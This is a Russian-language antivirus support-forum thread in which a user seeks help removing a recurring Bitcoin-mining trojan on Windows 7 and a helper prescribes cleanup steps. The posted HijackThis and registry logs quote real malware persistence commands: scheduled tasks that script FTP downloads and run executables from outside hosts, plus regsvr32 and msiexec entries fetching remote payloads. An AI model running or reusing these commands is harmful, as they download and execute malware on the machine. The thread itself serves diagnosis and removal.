Троян майнер 0621.exe и lsmo.exe

9 июля, 2017

Сначала появился троян майнер 0621.ехе в папке debug в каталоге виндовс(ось 7х64). Успешно выпилил его без особых проблем.

Спустя пару дней появился новый троян lsmo.exe (уже в папке help), тоже майнит биткойны. Процесс хакер показывает, что запускается он процессом wininit. После удаления возвращается в рандомное время и снова начинает майнить. Последний месяц новых программ не устанавливалось. При этом левых процессов не запущено, компьютер не перезагружается, автозагрузка пустая, левых служб нет, в реестре тоже ничего нет в автозагрузке. В планировщике заданий нет ничего. Все темповые файлы почистил.

Не могу найти, что его скачивает по новой и запускает. Систему переставлять не очень хочется, слишком много нужного софта стоит.

9 июля, 2017

Порядок оформления запроса о помощи

9 июля, 2017

Куреитом прогонял, ничего не находит.

Логи прикрепил

Думаю вот что вызывает проблемы

log:

O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
O22 - Task (Ready): Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Ready): ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

Вот еще гадость в реестре нашел, выпилил.

reg':

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\start]
regsvr32 /u /s /i:http://js.mykings.top:280/v.sctscrobj.dll []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\start1]
msiexec.exe /i http://js.mykings.top:280/helloworld.msi/q []

В C:\Windows\System32\Tasks удалил файлы Mysa, Mysa1, ok

CollectionLog-2017.07.09-20.48.zip

Изменено 9 июля, 2017 пользователем netmaster

9 июля, 2017

1)

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lineage 2\ﾈ胙魵鐱濵粽・url

заархивируйте и прикрепите к сообщению.

2) - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

3) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.

4) "Пофиксите" в HijackThis:

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes: DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} - Bing - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: URL = http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} - e - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C} - Google - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
O2-32 - BHO: IETabPage Class - {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} - C:\Program Files (x86)\XTab\SupTab.dll (file missing)
O2-32 - BHO: PROMT - {1F13CE11-4FAC-49A9-8155-D4F3F0F91A33} - N:\G\PRMT9\PRMTIE\prmtie.dll (file missing)
O3-32 - Toolbar: Переводчик PROMT - {C7DDDD27-F303-42A5-B979-51559F7DC0F0} - N:\G\PRMT9\PRMTIE\prmtie.dll (file missing)
O4 - MSConfig\startupreg: [GarenaPlus] C:\Garena Plus\GarenaMessenger.exe -autolaunch (file missing) (HKCU) (2014/05/01)
O4 - MSConfig\startupreg: [NeteaseGacc] N:\Netease\ty\game\uu\uu.exe  (file missing) (HKLM) (2016/12/04)
O4 - MSConfig\startupreg: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/05/09)
O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/05/09)
O8 - Extra context menu item: Автоматически определить профиль перевода - N:\G\PRMT9\PRMTIE\aot.htm (file missing)
O8 - Extra context menu item: Настроить параметры перевода - N:\G\PRMT9\PRMTIE\options.htm (file missing)
O8 - Extra context menu item: Перевести всю страницу - N:\G\PRMT9\PRMTIE\page.htm (file missing)
O8 - Extra context menu item: Перевести выделенный текст - N:\G\PRMT9\PRMTIE\translat.htm (file missing)
O8 - Extra context menu item: Перевести поисковый запрос - N:\G\PRMT9\PRMTIE\search.htm (file missing)
O22 - Task (Ready): GameNet - C:/Program Files (x86)/QGNA/qGNA.exe /minimized (file missing)

5) Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.

10 июля, 2017

Это что-то невероятное. Ничто не может справится с этим вирусом. Спустя 2-3 часа он снова вылезает и начинает майнить. Проблем он не доставляет, так как просто закрывается процесс, но всё же...Выход только переходить на 10-ку?

11 июля, 2017

@Михаил Андропов, здравствуйте! Не пишите в чужой теме. Создайте свою и выполните Порядок оформления запроса о помощи

Троян майнер 0621.exe и lsmo.exe

Рекомендуемые сообщения

netmaster

Ссылка на комментарий

Поделиться на другие сайты

Mark D. Pearlstone

Ссылка на комментарий

Поделиться на другие сайты

netmaster

Ссылка на комментарий

Поделиться на другие сайты

regist

Ссылка на комментарий

Поделиться на другие сайты

Михаил Андропов

Ссылка на комментарий

Поделиться на другие сайты

Sandor

Ссылка на комментарий

Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Похожий контент

Сайт

Активность

Магазин

Поддержка

Kaspersky Support Forum